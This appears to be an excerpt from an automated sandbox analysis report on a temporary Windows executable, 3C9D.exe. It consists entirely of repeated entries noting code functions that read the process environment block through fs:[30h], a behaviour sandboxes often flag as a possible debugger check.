                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B203B5A mov eax, dword ptr fs:[00000030h]30_2_6B203B5A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B203B5A mov eax, dword ptr fs:[00000030h]30_2_6B203B5A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B291BA8 mov eax, dword ptr fs:[00000030h]30_2_6B291BA8
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D4B94 mov edi, dword ptr fs:[00000030h]30_2_6B1D4B94
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B204BAD mov eax, dword ptr fs:[00000030h]30_2_6B204BAD
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B204BAD mov eax, dword ptr fs:[00000030h]30_2_6B204BAD
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B204BAD mov eax, dword ptr fs:[00000030h]30_2_6B204BAD
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A9BBE mov eax, dword ptr fs:[00000030h]30_2_6B2A9BBE
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A8BB6 mov eax, dword ptr fs:[00000030h]30_2_6B2A8BB6
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B29138A mov eax, dword ptr fs:[00000030h]30_2_6B29138A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B28D380 mov ecx, dword ptr fs:[00000030h]30_2_6B28D380
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B27EB8A mov ecx, dword ptr fs:[00000030h]30_2_6B27EB8A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B27EB8A mov eax, dword ptr fs:[00000030h]30_2_6B27EB8A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B27EB8A mov eax, dword ptr fs:[00000030h]30_2_6B27EB8A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B27EB8A mov eax, dword ptr fs:[00000030h]30_2_6B27EB8A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2823E3 mov ecx, dword ptr fs:[00000030h]30_2_6B2823E3
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2823E3 mov ecx, dword ptr fs:[00000030h]30_2_6B2823E3
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2823E3 mov eax, dword ptr fs:[00000030h]30_2_6B2823E3
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E3BF4 mov eax, dword ptr fs:[00000030h]30_2_6B1E3BF4
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E3BF4 mov ecx, dword ptr fs:[00000030h]30_2_6B1E3BF4
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D23F6 mov eax, dword ptr fs:[00000030h]30_2_6B1D23F6
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2553CA mov eax, dword ptr fs:[00000030h]30_2_6B2553CA
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2553CA mov eax, dword ptr fs:[00000030h]30_2_6B2553CA
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D1BE9 mov eax, dword ptr fs:[00000030h]30_2_6B1D1BE9
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FDBE9 mov eax, dword ptr fs:[00000030h]30_2_6B1FDBE9
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F3A1C mov eax, dword ptr fs:[00000030h]30_2_6B1F3A1C
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B25EA20 mov eax, dword ptr fs:[00000030h]30_2_6B25EA20
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D5210 mov eax, dword ptr fs:[00000030h]30_2_6B1D5210
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D5210 mov ecx, dword ptr fs:[00000030h]30_2_6B1D5210
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D5210 mov eax, dword ptr fs:[00000030h]30_2_6B1D5210
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D5210 mov eax, dword ptr fs:[00000030h]30_2_6B1D5210
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E8A0A mov eax, dword ptr fs:[00000030h]30_2_6B1E8A0A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B28D208 mov eax, dword ptr fs:[00000030h]30_2_6B28D208
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B28D208 mov eax, dword ptr fs:[00000030h]30_2_6B28D208
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D8239 mov eax, dword ptr fs:[00000030h]30_2_6B1D8239
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D8239 mov eax, dword ptr fs:[00000030h]30_2_6B1D8239
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D8239 mov eax, dword ptr fs:[00000030h]30_2_6B1D8239
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA229 mov eax, dword ptr fs:[00000030h]30_2_6B1FA229
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA229 mov eax, dword ptr fs:[00000030h]30_2_6B1FA229
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA229 mov eax, dword ptr fs:[00000030h]30_2_6B1FA229
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA229 mov eax, dword ptr fs:[00000030h]30_2_6B1FA229
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA229 mov eax, dword ptr fs:[00000030h]30_2_6B1FA229
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA229 mov eax, dword ptr fs:[00000030h]30_2_6B1FA229
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA229 mov eax, dword ptr fs:[00000030h]30_2_6B1FA229
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA229 mov eax, dword ptr fs:[00000030h]30_2_6B1FA229
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA229 mov eax, dword ptr fs:[00000030h]30_2_6B1FA229
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D4A20 mov eax, dword ptr fs:[00000030h]30_2_6B1D4A20
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D4A20 mov eax, dword ptr fs:[00000030h]30_2_6B1D4A20
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B28B260 mov eax, dword ptr fs:[00000030h]30_2_6B28B260
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B28B260 mov eax, dword ptr fs:[00000030h]30_2_6B28B260
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A8A62 mov eax, dword ptr fs:[00000030h]30_2_6B2A8A62
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21927A mov eax, dword ptr fs:[00000030h]30_2_6B21927A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D2240 mov ecx, dword ptr fs:[00000030h]30_2_6B1D2240
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D2240 mov eax, dword ptr fs:[00000030h]30_2_6B1D2240
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D9240 mov eax, dword ptr fs:[00000030h]30_2_6B1D9240
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D9240 mov eax, dword ptr fs:[00000030h]30_2_6B1D9240
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D9240 mov eax, dword ptr fs:[00000030h]30_2_6B1D9240
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D9240 mov eax, dword ptr fs:[00000030h]30_2_6B1D9240
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B264248 mov eax, dword ptr fs:[00000030h]30_2_6B264248
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B264257 mov eax, dword ptr fs:[00000030h]30_2_6B264257
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B205AA0 mov eax, dword ptr fs:[00000030h]30_2_6B205AA0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B205AA0 mov eax, dword ptr fs:[00000030h]30_2_6B205AA0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2012BD mov esi, dword ptr fs:[00000030h]30_2_6B2012BD
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2012BD mov eax, dword ptr fs:[00000030h]30_2_6B2012BD
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2012BD mov eax, dword ptr fs:[00000030h]30_2_6B2012BD
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20DA88 mov eax, dword ptr fs:[00000030h]30_2_6B20DA88
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20DA88 mov eax, dword ptr fs:[00000030h]30_2_6B20DA88
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1EAAB0 mov eax, dword ptr fs:[00000030h]30_2_6B1EAAB0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1EAAB0 mov eax, dword ptr fs:[00000030h]30_2_6B1EAAB0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20D294 mov eax, dword ptr fs:[00000030h]30_2_6B20D294
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20D294 mov eax, dword ptr fs:[00000030h]30_2_6B20D294
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D52A5 mov eax, dword ptr fs:[00000030h]30_2_6B1D52A5
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D52A5 mov eax, dword ptr fs:[00000030h]30_2_6B1D52A5
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D52A5 mov eax, dword ptr fs:[00000030h]30_2_6B1D52A5
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D52A5 mov eax, dword ptr fs:[00000030h]30_2_6B1D52A5
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D52A5 mov eax, dword ptr fs:[00000030h]30_2_6B1D52A5
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D1AA0 mov eax, dword ptr fs:[00000030h]30_2_6B1D1AA0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B202AE4 mov eax, dword ptr fs:[00000030h]30_2_6B202AE4
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294AEF mov eax, dword ptr fs:[00000030h]30_2_6B294AEF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294AEF mov eax, dword ptr fs:[00000030h]30_2_6B294AEF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294AEF mov eax, dword ptr fs:[00000030h]30_2_6B294AEF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294AEF mov eax, dword ptr fs:[00000030h]30_2_6B294AEF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294AEF mov eax, dword ptr fs:[00000030h]30_2_6B294AEF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294AEF mov eax, dword ptr fs:[00000030h]30_2_6B294AEF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294AEF mov eax, dword ptr fs:[00000030h]30_2_6B294AEF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294AEF mov eax, dword ptr fs:[00000030h]30_2_6B294AEF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294AEF mov eax, dword ptr fs:[00000030h]30_2_6B294AEF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294AEF mov eax, dword ptr fs:[00000030h]30_2_6B294AEF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294AEF mov eax, dword ptr fs:[00000030h]30_2_6B294AEF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294AEF mov eax, dword ptr fs:[00000030h]30_2_6B294AEF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294AEF mov eax, dword ptr fs:[00000030h]30_2_6B294AEF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294AEF mov eax, dword ptr fs:[00000030h]30_2_6B294AEF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D3ACA mov eax, dword ptr fs:[00000030h]30_2_6B1D3ACA
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D5AC0 mov eax, dword ptr fs:[00000030h]30_2_6B1D5AC0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D5AC0 mov eax, dword ptr fs:[00000030h]30_2_6B1D5AC0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D5AC0 mov eax, dword ptr fs:[00000030h]30_2_6B1D5AC0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B202ACB mov eax, dword ptr fs:[00000030h]30_2_6B202ACB
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A8ADD mov eax, dword ptr fs:[00000030h]30_2_6B2A8ADD
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20513A mov eax, dword ptr fs:[00000030h]30_2_6B20513A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20513A mov eax, dword ptr fs:[00000030h]30_2_6B20513A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D9100 mov eax, dword ptr fs:[00000030h]30_2_6B1D9100
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D9100 mov eax, dword ptr fs:[00000030h]30_2_6B1D9100
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D9100 mov eax, dword ptr fs:[00000030h]30_2_6B1D9100
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E0100 mov eax, dword ptr fs:[00000030h]30_2_6B1E0100
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E0100 mov eax, dword ptr fs:[00000030h]30_2_6B1E0100
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E0100 mov eax, dword ptr fs:[00000030h]30_2_6B1E0100
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D3138 mov ecx, dword ptr fs:[00000030h]30_2_6B1D3138
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F4120 mov eax, dword ptr fs:[00000030h]30_2_6B1F4120
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F4120 mov eax, dword ptr fs:[00000030h]30_2_6B1F4120
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F4120 mov eax, dword ptr fs:[00000030h]30_2_6B1F4120
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F4120 mov eax, dword ptr fs:[00000030h]30_2_6B1F4120
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F4120 mov ecx, dword ptr fs:[00000030h]30_2_6B1F4120
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D395E mov eax, dword ptr fs:[00000030h]30_2_6B1D395E
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D395E mov eax, dword ptr fs:[00000030h]30_2_6B1D395E
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B29E962 mov eax, dword ptr fs:[00000030h]30_2_6B29E962
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A8966 mov eax, dword ptr fs:[00000030h]30_2_6B2A8966
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FB944 mov eax, dword ptr fs:[00000030h]30_2_6B1FB944
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FB944 mov eax, dword ptr fs:[00000030h]30_2_6B1FB944
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DB171 mov eax, dword ptr fs:[00000030h]30_2_6B1DB171
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DB171 mov eax, dword ptr fs:[00000030h]30_2_6B1DB171
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2061A0 mov eax, dword ptr fs:[00000030h]30_2_6B2061A0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2061A0 mov eax, dword ptr fs:[00000030h]30_2_6B2061A0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D519E mov eax, dword ptr fs:[00000030h]30_2_6B1D519E
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D519E mov ecx, dword ptr fs:[00000030h]30_2_6B1D519E
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2949A4 mov eax, dword ptr fs:[00000030h]30_2_6B2949A4
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2949A4 mov eax, dword ptr fs:[00000030h]30_2_6B2949A4
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2949A4 mov eax, dword ptr fs:[00000030h]30_2_6B2949A4
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2949A4 mov eax, dword ptr fs:[00000030h]30_2_6B2949A4
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2551BE mov eax, dword ptr fs:[00000030h]30_2_6B2551BE
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2551BE mov eax, dword ptr fs:[00000030h]30_2_6B2551BE
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2551BE mov eax, dword ptr fs:[00000030h]30_2_6B2551BE
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2551BE mov eax, dword ptr fs:[00000030h]30_2_6B2551BE
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FC182 mov eax, dword ptr fs:[00000030h]30_2_6B1FC182
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20C9BF mov eax, dword ptr fs:[00000030h]30_2_6B20C9BF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20C9BF mov eax, dword ptr fs:[00000030h]30_2_6B20C9BF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2AF1B5 mov eax, dword ptr fs:[00000030h]30_2_6B2AF1B5
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2AF1B5 mov eax, dword ptr fs:[00000030h]30_2_6B2AF1B5
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F99BF mov ecx, dword ptr fs:[00000030h]30_2_6B1F99BF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F99BF mov ecx, dword ptr fs:[00000030h]30_2_6B1F99BF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F99BF mov eax, dword ptr fs:[00000030h]30_2_6B1F99BF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F99BF mov ecx, dword ptr fs:[00000030h]30_2_6B1F99BF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F99BF mov ecx, dword ptr fs:[00000030h]30_2_6B1F99BF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F99BF mov eax, dword ptr fs:[00000030h]30_2_6B1F99BF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F99BF mov ecx, dword ptr fs:[00000030h]30_2_6B1F99BF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F99BF mov ecx, dword ptr fs:[00000030h]30_2_6B1F99BF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F99BF mov eax, dword ptr fs:[00000030h]30_2_6B1F99BF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F99BF mov ecx, dword ptr fs:[00000030h]30_2_6B1F99BF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F99BF mov ecx, dword ptr fs:[00000030h]30_2_6B1F99BF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F99BF mov eax, dword ptr fs:[00000030h]30_2_6B1F99BF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B29A189 mov eax, dword ptr fs:[00000030h]30_2_6B29A189
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B29A189 mov ecx, dword ptr fs:[00000030h]30_2_6B29A189
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20A185 mov eax, dword ptr fs:[00000030h]30_2_6B20A185
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B204190 mov eax, dword ptr fs:[00000030h]30_2_6B204190
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B202990 mov eax, dword ptr fs:[00000030h]30_2_6B202990
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A89E7 mov eax, dword ptr fs:[00000030h]30_2_6B2A89E7
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2641E8 mov eax, dword ptr fs:[00000030h]30_2_6B2641E8
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E99C7 mov eax, dword ptr fs:[00000030h]30_2_6B1E99C7
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E99C7 mov eax, dword ptr fs:[00000030h]30_2_6B1E99C7
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E99C7 mov eax, dword ptr fs:[00000030h]30_2_6B1E99C7
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E99C7 mov eax, dword ptr fs:[00000030h]30_2_6B1E99C7
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DB1E1 mov eax, dword ptr fs:[00000030h]30_2_6B1DB1E1
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DB1E1 mov eax, dword ptr fs:[00000030h]30_2_6B1DB1E1
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DB1E1 mov eax, dword ptr fs:[00000030h]30_2_6B1DB1E1
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D31E0 mov eax, dword ptr fs:[00000030h]30_2_6B1D31E0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B204020 mov edi, dword ptr fs:[00000030h]30_2_6B204020
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DF018 mov eax, dword ptr fs:[00000030h]30_2_6B1DF018
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DF018 mov eax, dword ptr fs:[00000030h]30_2_6B1DF018
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D6800 mov eax, dword ptr fs:[00000030h]30_2_6B1D6800
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D6800 mov eax, dword ptr fs:[00000030h]30_2_6B1D6800
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D6800 mov eax, dword ptr fs:[00000030h]30_2_6B1D6800
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E8800 mov eax, dword ptr fs:[00000030h]30_2_6B1E8800
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA830 mov eax, dword ptr fs:[00000030h]30_2_6B1FA830
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA830 mov eax, dword ptr fs:[00000030h]30_2_6B1FA830
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA830 mov eax, dword ptr fs:[00000030h]30_2_6B1FA830
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA830 mov eax, dword ptr fs:[00000030h]30_2_6B1FA830
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2AF019 mov eax, dword ptr fs:[00000030h]30_2_6B2AF019
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2AF019 mov eax, dword ptr fs:[00000030h]30_2_6B2AF019
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1EB02A mov eax, dword ptr fs:[00000030h]30_2_6B1EB02A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1EB02A mov eax, dword ptr fs:[00000030h]30_2_6B1EB02A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1EB02A mov eax, dword ptr fs:[00000030h]30_2_6B1EB02A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1EB02A mov eax, dword ptr fs:[00000030h]30_2_6B1EB02A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A4015 mov eax, dword ptr fs:[00000030h]30_2_6B2A4015
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A4015 mov eax, dword ptr fs:[00000030h]30_2_6B2A4015
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D7055 mov eax, dword ptr fs:[00000030h]30_2_6B1D7055
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D5050 mov eax, dword ptr fs:[00000030h]30_2_6B1D5050
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D5050 mov eax, dword ptr fs:[00000030h]30_2_6B1D5050
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D5050 mov eax, dword ptr fs:[00000030h]30_2_6B1D5050
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B292073 mov eax, dword ptr fs:[00000030h]30_2_6B292073
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A1074 mov eax, dword ptr fs:[00000030h]30_2_6B2A1074
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FF86D mov eax, dword ptr fs:[00000030h]30_2_6B1FF86D
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2190AF mov eax, dword ptr fs:[00000030h]30_2_6B2190AF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D3880 mov eax, dword ptr fs:[00000030h]30_2_6B1D3880
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D3880 mov eax, dword ptr fs:[00000030h]30_2_6B1D3880
